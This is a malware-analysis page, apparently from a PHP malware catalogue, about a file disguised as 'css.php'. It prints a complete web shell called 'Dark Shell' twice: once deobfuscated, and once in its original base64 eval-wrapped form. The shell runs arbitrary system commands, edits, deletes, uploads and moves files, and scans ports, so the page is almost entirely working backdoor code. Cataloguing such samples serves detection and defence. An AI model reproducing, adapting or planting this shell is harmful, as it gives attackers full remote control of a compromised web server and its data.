PHP Malware Analysis

Back to list

Filename: css.php

Tags

Execution
  • system
Input
  • _GET
  • _POST
  • _FILES
Environment
  • set_time_limit
  • error_reporting
  • getcwd
Files
  • copy
  • move_uploaded_file

Deobfuscated code

<html>
<head>
<title>
Dark Shell
</title>
</head>
<body>
<style type="text/css">
body{
background: #E4E4E4;
color: #666666;
font-family: Verdana;
font-size: 11px;
}
a:link{
color: #33CC99;
}
a:visited{
color: #33CC99;
}
a:hover{
text-decoration: none;
Color: #3399FF;
}
table {
font-size: 11px;
}
</style>
<?php 
eval /* PHPDeobfuscator eval output */ {
    error_reporting(0);
    set_time_limit(0);
    if (empty($_GET['dir'])) {
        $dir = getcwd();
    } else {
        $dir = $_GET['dir'];
    }
    chdir($dir);
    $current = htmlentities($_SERVER['PHP_SELF'] . "?dir=" . $dir);
    echo "<center><h1>Dark Shell</h1></center><p><hr><p>\n";
    echo "<i>Server: " . $_SERVER['SERVER_NAME'] . "<br>\n";
    echo "Current directory: " . getcwd() . "<br>\n";
    echo "Software: " . $_SERVER['SERVER_SOFTWARE'] . "<pre>\n\n</pre></i>\n";
    echo "<pre>\n\n\n</pre>";
    echo "<table width = 50%>";
    echo "<tr>";
    echo "<td><a href = '" . $current . "&mode=system'>Shell Command</a></td>\n";
    echo "<td><a href = '" . $current . "&mode=create'>Create a new file</a></td>\n";
    echo "<td><a href = '" . $current . "&mode=upload'>Upload file</a></td>\n";
    echo "<td><a href = '" . $current . "&mode=port_scan'>Port Scan</a></td>\n";
    echo "</tr></table>";
    echo "<pre>\n\n</pre>";
    $mode = $_GET['mode'];
    switch ($mode) {
        case 'edit':
            $file = $_GET['file'];
            $new = $_POST['new'];
            if (empty($new)) {
                $fp = fopen($file, "r");
                $file_cont = fread($fp, filesize($file));
                $file_cont = str_replace("</textarea>", "<textarea>", $file_cont);
                echo "<form action = '" . $current . "&mode=edit&file=" . $file . "' method = 'POST'>\n";
                echo "File: " . $file . "<br>\n";
                echo "<textarea name = 'new' rows = '30' cols = '50'>" . $file_cont . "</textarea><br>\n";
                echo "<input type = 'submit' value = 'Edit'></form>\n";
            } else {
                $fp = fopen($file, "w");
                if (fwrite($fp, $new)) {
                    echo $file . " edited.<p>";
                } else {
                    echo "Unable to edit " . $file . ".<p>";
                }
            }
            fclose($fp);
            break;
        case 'delete':
            $file = $_GET['file'];
            if (unlink($file)) {
                echo $file . " deleted successfully.<p>";
            } else {
                echo "Unable to delete " . $file . ".<p>";
            }
            break;
        case 'copy':
            $src = $_GET['src'];
            $dst = $_POST['dst'];
            if (empty($dst)) {
                echo "<form action = '" . $current . "&mode=copy&src=" . $src . "' method = 'POST'>\n";
                echo "Destination: <input name = 'dst'><br>\n";
                echo "<input type = 'submit' value = 'Copy'></form>\n";
            } else {
                if (copy($src, $dst)) {
                    echo "File copied successfully.<p>\n";
                } else {
                    echo "Unable to copy " . $src . ".<p>\n";
                }
            }
            break;
        case 'move':
            $src = $_GET['src'];
            $dst = $_POST['dst'];
            if (empty($dst)) {
                echo "<form action = '" . $current . "&mode=move&src=" . $src . "' method = 'POST'>\n";
                echo "Destination: <input name = 'dst'><br>\n";
                echo "<input type = 'submit' value = 'Move'></form>\n";
            } else {
                if (rename($src, $dst)) {
                    echo "File moved successfully.<p>\n";
                } else {
                    echo "Unable to move " . $src . ".<p>\n";
                }
            }
            break;
        case 'rename':
            $old = $_GET['old'];
            $new = $_POST['new'];
            if (empty($new)) {
                echo "<form action = '" . $current . "&mode=rename&old=" . $old . "' method = 'POST'>\n";
                echo "New name: <input name = 'new'><br>\n";
                echo "<input type = 'submit' value = 'Rename'></form>\n";
            } else {
                if (rename($old, $new)) {
                    echo "File/Directory renamed successfully.<p>\n";
                } else {
                    echo "Unable to rename " . $old . ".<p>\n";
                }
            }
            break;
        case 'rmdir':
            $rm = $_GET['rm'];
            if (rmdir($rm)) {
                echo "Directory removed successfully.<p>\n";
            } else {
                echo "Unable to remove " . $rm . ".<p>\n";
            }
            break;
        case 'system':
            $cmd = $_POST['cmd'];
            if (empty($cmd)) {
                echo "<form action = '" . $current . "&mode=system' method = 'POST'>\n";
                echo "Shell Command: <input name = 'cmd'>\n";
                echo "<input type = 'submit' value = 'Run'></form><p>\n";
            } else {
                system($cmd);
            }
            break;
        case 'create':
            $new = $_POST['new'];
            if (empty($new)) {
                echo "<form action = '" . $current . "&mode=create' method = 'POST'>\n";
                echo "<tr><td>New file: <input name = 'new'></td>\n";
                echo "<td><input type = 'submit' value = 'Create'></td></tr></form>\n<p>";
            } else {
                if ($fp = fopen($new, "w")) {
                    echo "File created successfully.<p>\n";
                } else {
                    echo "Unable to create " . $file . ".<p>\n";
                }
                fclose($fp);
            }
            break;
        case 'upload':
            $temp = $_FILES['upload_file']['tmp_name'];
            $file = basename($_FILES['upload_file']['name']);
            if (empty($file)) {
                echo "<form action = '" . $current . "&mode=upload' method = 'POST' ENCTYPE='multipart/form-data'>\n";
                echo "Local file: <input type = 'file' name = 'upload_file'>\n";
                echo "<input type = 'submit' value = 'Upload'>\n";
                echo "</form>\n<pre>\n\n</pre>";
            } else {
                if (move_uploaded_file($temp, $file)) {
                    echo "File uploaded successfully.<p>\n";
                    unlink($temp);
                } else {
                    echo "Unable to upload " . $file . ".<p>\n";
                }
            }
            break;
        case 'port_scan':
            $port_range = $_POST['port_range'];
            if (empty($port_range)) {
                echo "<table><form action = '" . $current . "&mode=port_scan' method = 'POST'>";
                echo "<tr><td><input type = 'text' name = 'port_range'></td><td>";
                echo "Enter port range where you want to do port scan (ex.: 0:65535)</td></tr>";
                echo "<tr><td><input type = 'submit' value = 'Port Scan'></td></tr></form></table>";
            } else {
                $range = explode(":", $port_range);
                if (!is_numeric($range[0]) or !is_numeric($range[1])) {
                    echo "Bad parameters.<br>";
                } else {
                    $host = 'localhost';
                    $from = $range[0];
                    $to = $range[1];
                    echo "Open ports:<br>";
                    while ($from <= $to) {
                        $var = 0;
                        $fp = fsockopen($host, $from) or $var = 1;
                        if (false) {
                            echo $from . "<br>";
                        }
                        $from++;
                        fclose($fp);
                    }
                }
            }
            break;
    }
    clearstatcache();
    echo "<pre>\n\n</pre>";
    echo "<table width = 100%>\n";
    $files = scandir($dir);
    foreach ($files as $file) {
        if (is_file($file)) {
            $size = round(filesize($file) / 1024, 2);
            echo "<tr><td>" . $file . "</td>";
            echo "<td>" . $size . " KB</td>";
            echo "<td><a href = " . $current . "&mode=edit&file=" . $file . ">Edit</a></td>\n";
            echo "<td><a href = " . $current . "&mode=delete&file=" . $file . ">Delete</a></td>\n";
            echo "<td><a href = " . $current . "&mode=copy&src=" . $file . ">Copy</a></td>\n";
            echo "<td><a href = " . $current . "&mode=move&src=" . $file . ">Move</a></td>\n";
            echo "<td><a href = " . $current . "&mode=rename&old=" . $file . ">Remame</a></td></tr>\n";
        } else {
            $items = scandir($file);
            $items_num = count($items) - 2;
            echo "<tr><td>" . $file . "</td>";
            echo "<td>" . $items_num . " Items</td>";
            echo "<td><a href = " . $current . "/" . $file . ">Change directory</a></td>\n";
            echo "<td><a href = " . $current . "&mode=rmdir&rm=" . $file . ">Remove directory</a></td>\n";
            echo "<td><a href = " . $current . "&mode=rename&old=" . $file . ">Rename directory</a></td></tr>\n";
        }
    }
    echo "</table>\n";
};


Original code

<html>
<head>
<title>
Dark Shell
</title>
</head>
<body>
<style type="text/css">
body{
background: #E4E4E4;
color: #666666;
font-family: Verdana;
font-size: 11px;
}
a:link{
color: #33CC99;
}
a:visited{
color: #33CC99;
}
a:hover{
text-decoration: none;
Color: #3399FF;
}
table {
font-size: 11px;
}
</style>
<?php
eval(base64_decode('
ZXJyb3JfcmVwb3J0aW5nICgwKTsKc2V0X3RpbWVfbGltaXQgKDApOwppZiAoZW1wdHkgKCRfR0VUIFsnZGlyJ10pKXsKJGRpciA9IGdldGN3ZCAoKTsKfQplbHNlIHsKJGRpciA9ICRfR0VUIFsnZGlyJ107Cn0KY2hkaXIgKCRkaXIpOwokY3VycmVudCA9IGh0bWxlbnRpdGllcyAoJF9TRVJWRVIgWydQSFBfU0VMRiddIC4gIj9kaXI9IiAuICRkaXIpOwoKZWNobyAiPGNlbnRlcj48aDE+RGFyayBTaGVsbDwvaDE+PC9jZW50ZXI+PHA+PGhyPjxwPlxuIjsKZWNobyAiPGk+U2VydmVyOiAiIC4gJF9TRVJWRVIgWydTRVJWRVJfTkFNRSddIC4gIjxicj5cbiI7CmVjaG8gIkN1cnJlbnQgZGlyZWN0b3J5OiAiIC4gZ2V0Y3dkICgpIC4gIjxicj5cbiI7CmVjaG8gIlNvZnR3YXJlOiAiIC4gJF9TRVJWRVIgWydTRVJWRVJfU09GVFdBUkUnXSAuICI8cHJlPlxuXG48L3ByZT48L2k+XG4iOwplY2hvICI8cHJlPlxuXG5cbjwvcHJlPiI7CgplY2hvICI8dGFibGUgd2lkdGggPSA1MCU+IjsKZWNobyAiPHRyPiI7CmVjaG8gIjx0ZD48YSBocmVmID0gJyIuJGN1cnJlbnQuIiZtb2RlPXN5c3RlbSc+U2hlbGwgQ29tbWFuZDwvYT48L3RkPlxuIjsKZWNobyAiPHRkPjxhIGhyZWYgPSAnIi4kY3VycmVudC4iJm1vZGU9Y3JlYXRlJz5DcmVhdGUgYSBuZXcgZmlsZTwvYT48L3RkPlxuIjsKZWNobyAiPHRkPjxhIGhyZWYgPSAnIi4kY3VycmVudC4iJm1vZGU9dXBsb2FkJz5VcGxvYWQgZmlsZTwvYT48L3RkPlxuIjsKZWNobyAiPHRkPjxhIGhyZWYgPSAnIi4kY3VycmVudC4iJm1vZGU9cG9ydF9zY2FuJz5Qb3J0IFNjYW48L2E+PC90ZD5cbiI7CmVjaG8gIjwvdHI+PC90YWJsZT4iOwplY2hvICI8cHJlPlxuXG48L3ByZT4iOwoKCgokbW9kZSA9ICRfR0VUIFsnbW9kZSddOwpzd2l0Y2ggKCRtb2RlKXsKY2FzZSAnZWRpdCc6CiRmaWxlID0gJF9HRVQgWydmaWxlJ107CiRuZXcgPSAkX1BPU1QgWyduZXcnXTsKaWYgKGVtcHR5ICgkbmV3KSl7CiRmcCA9IGZvcGVuICgkZmlsZSwgInIiKTsKJGZpbGVfY29udCA9IGZyZWFkICgkZnAsIGZpbGVzaXplICgkZmlsZSkpOwokZmlsZV9jb250ID0gc3RyX3JlcGxhY2UgKCI8L3RleHRhcmVhPiIsICI8dGV4dGFyZWE+IiwgJGZpbGVfY29udCk7CmVjaG8gIjxmb3JtIGFjdGlvbiA9ICciLiRjdXJyZW50LiImbW9kZT1lZGl0JmZpbGU9Ii4kZmlsZS4iJyBtZXRob2QgPSAnUE9TVCc+XG4iOwplY2hvICJGaWxlOiAiLiAkZmlsZSAuICI8YnI+XG4iOwplY2hvICI8dGV4dGFyZWEgbmFtZSA9ICduZXcnIHJvd3MgPSAnMzAnIGNvbHMgPSAnNTAnPiIuJGZpbGVfY29udC4iPC90ZXh0YXJlYT48YnI+XG4iOwplY2hvICI8aW5wdXQgdHlwZSA9ICdzdWJtaXQnIHZhbHVlID0gJ0VkaXQnPjwvZm9ybT5cbiI7Cn0KZWxzZSB7CiRmcCA9IGZvcGVuICgkZmlsZSwgInciKTsKaWYgKGZ3cml0ZSAoJGZwLCAkbmV3KSl7CmVjaG8gJGZpbGUgLiAiIGVkaXRlZC48cD4iOwp9CmVsc2UgewplY2hvICJVbmFibGUgdG8gZWRpdCAiIC4gJGZpbGUgLiAiLjxwPiI7Cn0KfQpmY2xvc2UgKCRmcCk7CmJyZWFrOwpjYXNlICdkZWxldGUnOgokZmlsZSA9ICRfR0VUIFsnZmlsZSddOwppZiAodW5saW5rICgkZmlsZSkpewplY2hvICRmaWxlIC4gIiBkZWxldGVkIHN1Y2Nlc3NmdWxseS48cD4iOwp9CmVsc2UgewplY2hvICJVbmFibGUgdG8gZGVsZXRlICIgLiAkZmlsZSAuICIuPHA+IjsKfQpicmVhazsKY2FzZSAnY29weSc6CiRzcmMgPSAkX0dFVCBbJ3NyYyddOwokZHN0ID0gJF9QT1NUIFsnZHN0J107CmlmIChlbXB0eSAoJGRzdCkpewplY2hvICI8Zm9ybSBhY3Rpb24gPSAnIi4kY3VycmVudCAuICImbW9kZT1jb3B5JnNyYz0iIC4gJHNyYyAuICInIG1ldGhvZCA9ICdQT1NUJz5cbiI7CmVjaG8gIkRlc3RpbmF0aW9uOiA8aW5wdXQgbmFtZSA9ICdkc3QnPjxicj5cbiI7CmVjaG8gIjxpbnB1dCB0eXBlID0gJ3N1Ym1pdCcgdmFsdWUgPSAnQ29weSc+PC9mb3JtPlxuIjsKfQplbHNlIHsKaWYgKGNvcHkgKCRzcmMsICRkc3QpKXsKZWNobyAiRmlsZSBjb3BpZWQgc3VjY2Vzc2Z1bGx5LjxwPlxuIjsKfQplbHNlIHsKZWNobyAiVW5hYmxlIHRvIGNvcHkgIiAuICRzcmMgLiAiLjxwPlxuIjsKfQp9CmJyZWFrOwpjYXNlICdtb3ZlJzoKJHNyYyA9ICRfR0VUIFsnc3JjJ107CiRkc3QgPSAkX1BPU1QgWydkc3QnXTsKaWYgKGVtcHR5ICgkZHN0KSl7CmVjaG8gIjxmb3JtIGFjdGlvbiA9ICciLiRjdXJyZW50IC4gIiZtb2RlPW1vdmUmc3JjPSIgLiAkc3JjIC4gIicgbWV0aG9kID0gJ1BPU1QnPlxuIjsKZWNobyAiRGVzdGluYXRpb246IDxpbnB1dCBuYW1lID0gJ2RzdCc+PGJyPlxuIjsKZWNobyAiPGlucHV0IHR5cGUgPSAnc3VibWl0JyB2YWx1ZSA9ICdNb3ZlJz48L2Zvcm0+XG4iOwp9CmVsc2UgewppZiAocmVuYW1lICgkc3JjLCAkZHN0KSl7CmVjaG8gIkZpbGUgbW92ZWQgc3VjY2Vzc2Z1bGx5LjxwPlxuIjsKfQplbHNlIHsKZWNobyAiVW5hYmxlIHRvIG1vdmUgIiAuICRzcmMgLiAiLjxwPlxuIjsKfQp9CmJyZWFrOwpjYXNlICdyZW5hbWUnOgokb2xkID0gJF9HRVQgWydvbGQnXTsKJG5ldyA9ICRfUE9TVCBbJ25ldyddOwppZiAoZW1wdHkgKCRuZXcpKXsKZWNobyAiPGZvcm0gYWN0aW9uID0gJyIuJGN1cnJlbnQgLiAiJm1vZGU9cmVuYW1lJm9sZD0iIC4gJG9sZCAuICInIG1ldGhvZCA9ICdQT1NUJz5cbiI7CmVjaG8gIk5ldyBuYW1lOiA8aW5wdXQgbmFtZSA9ICduZXcnPjxicj5cbiI7CmVjaG8gIjxpbnB1dCB0eXBlID0gJ3N1Ym1pdCcgdmFsdWUgPSAnUmVuYW1lJz48L2Zvcm0+XG4iOwp9CmVsc2UgewppZiAocmVuYW1lICgkb2xkLCAkbmV3KSl7CmVjaG8gIkZpbGUvRGlyZWN0b3J5IHJlbmFtZWQgc3VjY2Vzc2Z1bGx5LjxwPlxuIjsKfQplbHNlIHsKZWNobyAiVW5hYmxlIHRvIHJlbmFtZSAiIC4gJG9sZCAuICIuPHA+XG4iOwp9Cn0KYnJlYWs7CgpjYXNlICdybWRpcic6CiRybSA9ICRfR0VUIFsncm0nXTsKaWYgKHJtZGlyICgkcm0pKXsKZWNobyAiRGlyZWN0b3J5IHJlbW92ZWQgc3VjY2Vzc2Z1bGx5LjxwPlxuIjsKfQplbHNlIHsKZWNobyAiVW5hYmxlIHRvIHJlbW92ZSAiIC4gJHJtIC4gIi48cD5cbiI7Cn0KYnJlYWs7CmNhc2UgJ3N5c3RlbSc6CiRjbWQgPSAkX1BPU1QgWydjbWQnXTsKaWYgKGVtcHR5ICgkY21kKSl7CmVjaG8gIjxmb3JtIGFjdGlvbiA9ICciLiRjdXJyZW50IC4gIiZtb2RlPXN5c3RlbScgbWV0aG9kID0gJ1BPU1QnPlxuIjsKZWNobyAiU2hlbGwgQ29tbWFuZDogPGlucHV0IG5hbWUgPSAnY21kJz5cbiI7CmVjaG8gIjxpbnB1dCB0eXBlID0gJ3N1Ym1pdCcgdmFsdWUgPSAnUnVuJz48L2Zvcm0+PHA+XG4iOwp9CmVsc2UgewpzeXN0ZW0gKCRjbWQpOwp9CmJyZWFrOwpjYXNlICdjcmVhdGUnOgokbmV3ID0gJF9QT1NUIFsnbmV3J107CmlmIChlbXB0eSAoJG5ldykpewplY2hvICI8Zm9ybSBhY3Rpb24gPSAnIi4kY3VycmVudCAuICImbW9kZT1jcmVhdGUnIG1ldGhvZCA9ICdQT1NUJz5cbiI7CmVjaG8gIjx0cj48dGQ+TmV3IGZpbGU6IDxpbnB1dCBuYW1lID0gJ25ldyc+PC90ZD5cbiI7CmVjaG8gIjx0ZD48aW5wdXQgdHlwZSA9ICdzdWJtaXQnIHZhbHVlID0gJ0NyZWF0ZSc+PC90ZD48L3RyPjwvZm9ybT5cbjxwPiI7Cn0KZWxzZSB7CmlmICgkZnAgPSBmb3BlbiAoJG5ldywgInciKSl7CmVjaG8gIkZpbGUgY3JlYXRlZCBzdWNjZXNzZnVsbHkuPHA+XG4iOwp9CmVsc2UgewplY2hvICJVbmFibGUgdG8gY3JlYXRlICIuJGZpbGUuIi48cD5cbiI7Cn0KZmNsb3NlICgkZnApOwp9CmJyZWFrOwpjYXNlICd1cGxvYWQnOgokdGVtcCA9ICRfRklMRVNbJ3VwbG9hZF9maWxlJ11bJ3RtcF9uYW1lJ107CiRmaWxlID0gYmFzZW5hbWUoJF9GSUxFU1sndXBsb2FkX2ZpbGUnXVsnbmFtZSddKTsKaWYgKGVtcHR5ICgkZmlsZSkpewplY2hvICI8Zm9ybSBhY3Rpb24gPSAnIi4kY3VycmVudCAuICImbW9kZT11cGxvYWQnIG1ldGhvZCA9ICdQT1NUJyBFTkNUWVBFPSdtdWx0aXBhcnQvZm9ybS1kYXRhJz5cbiI7CmVjaG8gIkxvY2FsIGZpbGU6IDxpbnB1dCB0eXBlID0gJ2ZpbGUnIG5hbWUgPSAndXBsb2FkX2ZpbGUnPlxuIjsKZWNobyAiPGlucHV0IHR5cGUgPSAnc3VibWl0JyB2YWx1ZSA9ICdVcGxvYWQnPlxuIjsKZWNobyAiPC9mb3JtPlxuPHByZT5cblxuPC9wcmU+IjsKfQplbHNlIHsKaWYobW92ZV91cGxvYWRlZF9maWxlKCR0ZW1wLCRmaWxlKSl7CmVjaG8gIkZpbGUgdXBsb2FkZWQgc3VjY2Vzc2Z1bGx5LjxwPlxuIjsKdW5saW5rICgkdGVtcCk7Cn0KZWxzZSB7CmVjaG8gIlVuYWJsZSB0byB1cGxvYWQgIiAuICRmaWxlIC4gIi48cD5cbiI7Cn0KfQpicmVhazsKCmNhc2UgJ3BvcnRfc2Nhbic6CiRwb3J0X3JhbmdlID0gJF9QT1NUIFsncG9ydF9yYW5nZSddOwppZiAoZW1wdHkgKCRwb3J0X3JhbmdlKSl7CmVjaG8gIjx0YWJsZT48Zm9ybSBhY3Rpb24gPSAnIi4kY3VycmVudC4gIiZtb2RlPXBvcnRfc2NhbicgbWV0aG9kID0gJ1BPU1QnPiI7CmVjaG8gIjx0cj48dGQ+PGlucHV0IHR5cGUgPSAndGV4dCcgbmFtZSA9ICdwb3J0X3JhbmdlJz48L3RkPjx0ZD4iOwplY2hvICJFbnRlciBwb3J0IHJhbmdlIHdoZXJlIHlvdSB3YW50IHRvIGRvIHBvcnQgc2NhbiAoZXguOiAwOjY1NTM1KTwvdGQ+PC90cj4iOwplY2hvICI8dHI+PHRkPjxpbnB1dCB0eXBlID0gJ3N1Ym1pdCcgdmFsdWUgPSAnUG9ydCBTY2FuJz48L3RkPjwvdHI+PC9mb3JtPjwvdGFibGU+IjsKfQplbHNlIHsKJHJhbmdlID0gZXhwbG9kZSAoIjoiLCAkcG9ydF9yYW5nZSk7CmlmICgoIWlzX251bWVyaWMgKCRyYW5nZSBbMF0pKSBvciAoIWlzX251bWVyaWMgKCRyYW5nZSBbMV0pKSl7CmVjaG8gIkJhZCBwYXJhbWV0ZXJzLjxicj4iOwp9CmVsc2UgewokaG9zdCA9ICdsb2NhbGhvc3QnOwokZnJvbSA9ICRyYW5nZSBbMF07CiR0byA9ICRyYW5nZSBbMV07CmVjaG8gIk9wZW4gcG9ydHM6PGJyPiI7CndoaWxlICgkZnJvbSA8PSAkdG8pewokdmFyID0gMDsKJGZwID0gZnNvY2tvcGVuICgkaG9zdCwgJGZyb20pIG9yICR2YXIgPSAxOwppZiAoJHZhciA9PSAwKXsKZWNobyAkZnJvbSAuICI8YnI+IjsKfQokZnJvbSsrOwpmY2xvc2UgKCRmcCk7Cn0KfQp9CmJyZWFrOwoKCn0KCmNsZWFyc3RhdGNhY2hlICgpOwoKZWNobyAiPHByZT5cblxuPC9wcmU+IjsKZWNobyAiPHRhYmxlIHdpZHRoID0gMTAwJT5cbiI7CiRmaWxlcyA9IHNjYW5kaXIgKCRkaXIpOwpmb3JlYWNoICgkZmlsZXMgYXMgJGZpbGUpewppZiAoaXNfZmlsZSAoJGZpbGUpKXsKCiRzaXplID0gcm91bmQgKGZpbGVzaXplICgkZmlsZSkgLyAxMDI0LCAyKTsKZWNobyAiPHRyPjx0ZD4iLiRmaWxlLiI8L3RkPiI7CmVjaG8gIjx0ZD4iLiRzaXplLiIgS0I8L3RkPiI7CmVjaG8gIjx0ZD48YSBocmVmID0gIi4kY3VycmVudCAuICImbW9kZT1lZGl0JmZpbGU9Ii4kZmlsZS4iPkVkaXQ8L2E+PC90ZD5cbiI7CmVjaG8gIjx0ZD48YSBocmVmID0gIi4kY3VycmVudCAuICImbW9kZT1kZWxldGUmZmlsZT0iLiRmaWxlLiI+RGVsZXRlPC9hPjwvdGQ+XG4iOwplY2hvICI8dGQ+PGEgaHJlZiA9ICIuJGN1cnJlbnQgLiAiJm1vZGU9Y29weSZzcmM9Ii4kZmlsZS4iPkNvcHk8L2E+PC90ZD5cbiI7CmVjaG8gIjx0ZD48YSBocmVmID0gIi4kY3VycmVudCAuICImbW9kZT1tb3ZlJnNyYz0iLiRmaWxlLiI+TW92ZTwvYT48L3RkPlxuIjsKZWNobyAiPHRkPjxhIGhyZWYgPSAiLiRjdXJyZW50IC4gIiZtb2RlPXJlbmFtZSZvbGQ9Ii4kZmlsZS4iPlJlbWFtZTwvYT48L3RkPjwvdHI+XG4iOwp9CmVsc2UgewokaXRlbXMgPSBzY2FuZGlyICgkZmlsZSk7CiRpdGVtc19udW0gPSBjb3VudCAoJGl0ZW1zKSAtIDI7CmVjaG8gIjx0cj48dGQ+Ii4kZmlsZS4iPC90ZD4iOwplY2hvICI8dGQ+Ii4kaXRlbXNfbnVtLiIgSXRlbXM8L3RkPiI7CmVjaG8gIjx0ZD48YSBocmVmID0gIi4kY3VycmVudCAuICIvIiAuICRmaWxlLiI+Q2hhbmdlIGRpcmVjdG9yeTwvYT48L3RkPlxuIjsKZWNobyAiPHRkPjxhIGhyZWYgPSAiLiRjdXJyZW50IC4gIiZtb2RlPXJtZGlyJnJtPSIuJGZpbGUuIj5SZW1vdmUgZGlyZWN0b3J5PC9hPjwvdGQ+XG4iOwplY2hvICI8dGQ+PGEgaHJlZiA9ICIuJGN1cnJlbnQgLiAiJm1vZGU9cmVuYW1lJm9sZD0iLiRmaWxlLiI+UmVuYW1lIGRpcmVjdG9yeTwvYT48L3RkPjwvdHI+XG4iOwp9Cn0KZWNobyAiPC90YWJsZT5cbiI7Cg=='));
?>